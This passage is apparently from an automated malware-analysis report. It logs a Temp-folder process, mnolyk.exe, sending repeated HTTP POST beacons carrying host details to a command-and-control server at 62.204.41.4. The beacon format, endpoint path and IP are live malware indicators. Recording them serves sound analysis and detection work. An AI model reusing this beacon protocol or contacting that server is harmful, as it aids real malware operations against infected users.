                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    174 | 192.168.2.3 | 49876 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:04.982214928 CET | 375 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:05.048247099 CET | 375 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:05 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    175 | 192.168.2.3 | 49877 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:05.223018885 CET | 375 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:05.286161900 CET | 376 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:05 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    176 | 192.168.2.3 | 49878 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:05.452116966 CET | 377 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:05.518059969 CET | 377 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:05 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    177 | 192.168.2.3 | 49879 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:05.692639112 CET | 378 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:05.757045984 CET | 378 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:05 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    178 | 192.168.2.3 | 49880 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:05.941168070 CET | 379 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:06.007395029 CET | 379 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:05 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    179 | 192.168.2.3 | 49881 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:06.188564062 CET | 380 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:06.255192995 CET | 380 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:06 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    18 | 192.168.2.3 | 49719 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:17.030553102 CET | 219 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:17.097150087 CET | 219 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:17 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    180 | 192.168.2.3 | 49882 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:06.440098047 CET | 380 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:06.503624916 CET | 381 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:06 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    181 | 192.168.2.3 | 49883 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:06.680162907 CET | 382 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:06.744971037 CET | 382 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:06 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    182 | 192.168.2.3 | 49884 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:06.923409939 CET | 383 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:06.988398075 CET | 383 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:06 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    183 | 192.168.2.3 | 49885 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:07.169003963 CET | 384 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:07.232494116 CET | 384 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:07 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    184 | 192.168.2.3 | 49886 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:07.408943892 CET | 385 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:07.470880985 CET | 385 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:07 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    185 | 192.168.2.3 | 49887 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:07.638708115 CET | 386 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:07.702848911 CET | 386 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:07 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    186 | 192.168.2.3 | 49888 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:07.875066042 CET | 387 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:07.939343929 CET | 387 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:07 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    187 | 192.168.2.3 | 49889 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:08.107630968 CET | 388 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:08.173487902 CET | 388 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:08 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    188 | 192.168.2.3 | 49890 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:08.343446970 CET | 389 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:08.408909082 CET | 389 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:08 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    189 | 192.168.2.3 | 49891 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:08.577608109 CET | 390 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:08.642038107 CET | 390 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:08 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    19 | 192.168.2.3 | 49720 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:17.276374102 CET | 220 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:17.340347052 CET | 220 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:17 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    190 | 192.168.2.3 | 49892 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:08.821841002 CET | 391 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:08.885063887 CET | 391 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:08 GMT
                                                                    Content-Type: text/html; charset=UTF-8
